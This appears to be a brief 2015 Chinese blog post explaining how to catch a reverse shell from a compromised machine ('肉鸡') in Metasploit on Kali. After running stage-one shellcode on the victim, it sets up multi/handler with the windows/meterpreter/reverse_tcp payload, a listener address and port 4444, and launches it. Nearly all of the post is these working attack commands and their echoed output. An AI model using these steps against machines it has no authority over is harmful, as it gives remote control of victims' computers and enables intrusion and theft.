您的位置:首页 > 运维架构 > Shell

反弹stage shellcode到meterpreter

2015-05-12 23:17 417 查看
1.在肉鸡上运行stage1的shellcode

2.在kali上运行metsploit framework

3.执行下面的命令

msf > use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.123

LHOST => 192.168.1.123

msf exploit(handler) > set LPORT 4444

LPORT => 4444

msf exploit(handler) > exploit
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: